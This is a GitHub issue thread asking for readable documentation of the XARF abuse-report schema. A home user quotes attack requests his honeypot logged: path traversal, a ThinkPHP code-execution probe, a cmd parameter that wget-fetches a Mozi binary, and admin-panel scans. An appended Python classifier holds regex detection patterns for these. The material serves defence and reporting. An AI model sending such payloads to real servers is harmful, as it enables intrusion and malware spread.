
Create documentation

Open FrederikP opened this issue 4 years ago • 3 comments

Currently xarf is mainly documented via the schema itself and description fields. That's not really comfortable to read. I think the most commonly used resources when using xarf right now are the samples. We should create detailed documentation clarifying what the fields mean, what is required, etc.

FrederikP avatar Oct 26 '21 14:10 FrederikP

It would indeed be appreciated to have clear documentation in English rather than just in JSON. Besides, apart from readability, "everything you need to know about the protocol" is more than what's on the wire or what can be expressed in JSON (take a look at any random RFC for examples).

(I am considering writing an XARF generator for the intrusion detection system I'm building. Currently, I'm sending the logs of SSH login attacks to Blocklist.de, and have them do the hard work of submitting it as XARF reports, so a lot of thanks to them.)

IByte avatar Feb 25 '22 13:02 IByte

Hi IByte,

just wanted to let you know about news from today: https://abusix.com/resources/blocklists/abusix-to-take-over-the-operation-of-blocklist-de/ since you mentioned blocklist.de in your question.

If you want, please reach out to us directly and we will be happy to work with you and get you into an early adopter stage for the new things we are planning to do with blocklist.de. Thanks!

tknecht avatar Feb 28 '22 17:02 tknecht

Hello Tobias,

Yes, I am interested in seeing new features on blocklist.de to make abuse reporting more convenient.

I should note that I am a home (i.e. not corporate) user, albeit with a computer science degree.

The advantage of being the only legitimate user of my server from an abuse detection point of view is that it greatly simplifies telling the good traffic from the bad.

The intrusion detection software I'm working on focuses mainly on web traffic, essentially turning it into a honeypot for any web application that isn't actually installed (which is most things), and sends reports about it to IP blocklists. It also incorporates the SSH bans database from fail2ban and sends these to blocklist.de.

While I'm on the subject, is there a XARF reporting type for these types of web-based abuse, e.g. directory traversal attempts, remote code execution and/or trying to download shellcode or trying 251 different ways of saying "phpMyAdmin" to see whether it is on the server? A few examples of the things I'd like to report (edited for brevity):

```
GET ///remote/fgt_lang?lang=/../../../..//////////dev/ HTTP/1.1
GET /index.php?function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
GET /setup.cgi?cmd=wget+http://some.ip:51486/Mozi.m HTTP/1.0
GET /mysql/sqlmanager/index.php HTTP/1.1
GET /pma2011/index.php HTTP/1.1
```

To expand on that subject and return to the original topic of this issue, although I found fail2ban's sample implementation of XARF reporting at https://github.com/fail2ban/fail2ban/blob/master/config/action.d/xarf-login-attack.conf rather informative, as I said earlier, both that and the contents of this repository focus largely on syntax and not so much on semantics, or in plain English, what does it actually mean? When are you supposed to use what kind of reporting type, for instance? The schema files currently don't offer a lot more than a repetition of the type name on that subject.

IByte avatar Mar 02 '22 13:03 IByte
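As an added illustration (not code from the xarf project or from any participant in this thread), here is a small classifier that buckets request lines like the ones quoted above into defender-side categories before a report is assembled. The category names and the regexes are this example's own assumptions, not XARF report types; the sample requests are the constructed ones from the post.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample input: the request lines quoted in the post above.
SAMPLE_REQUESTS = [
    "GET ///remote/fgt_lang?lang=/../../../..//////////dev/ HTTP/1.1",
    "GET /index.php?function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1",
    "GET /setup.cgi?cmd=wget+http://some.ip:51486/Mozi.m HTTP/1.0",
    "GET /mysql/sqlmanager/index.php HTTP/1.1",
    "GET /pma2011/index.php HTTP/1.1",
]

# Ordered rules; the first match wins. These labels are assumptions for this
# example only and do NOT correspond to any XARF ReportType value.
RULES = [
    ("path-traversal", re.compile(r"(\.\./|\.\.\\)")),
    ("remote-download", re.compile(r"\b(wget|curl|tftp)\b.*https?://", re.I)),
    ("code-execution", re.compile(r"(call_user_func|eval\(|system\(|cmd=)", re.I)),
    ("admin-panel-scan", re.compile(r"/(pma|phpmyadmin|sqlmanager|mysql)", re.I)),
]


def classify(request_line):
    """Return (category, decoded_target) for one HTTP request line.

    Returns None when the line is malformed or no rule matches (i.e. the
    request looks benign as far as these rules know).
    """
    parts = request_line.split()
    if len(parts) != 3:
        return None
    _method, target, _version = parts
    # Decode percent-encoding and '+' so that encoded traversal sequences and
    # 'wget+http://' style payloads are matched on their decoded form.
    decoded = unquote_plus(target)
    for category, pattern in RULES:
        if pattern.search(decoded):
            return category, decoded
    return None


def summarize(request_lines):
    """Group request lines by category; benign/unmatched lines are dropped."""
    buckets = {}
    for line in request_lines:
        hit = classify(line)
        if hit is not None:
            buckets.setdefault(hit[0], []).append(hit[1])
    return buckets


if __name__ == "__main__":
    for category, targets in summarize(SAMPLE_REQUESTS).items():
        print(category, targets)
```

The resulting bucket name is what a reporter would then map onto whichever reporting type the XARF documentation eventually prescribes for web-based abuse.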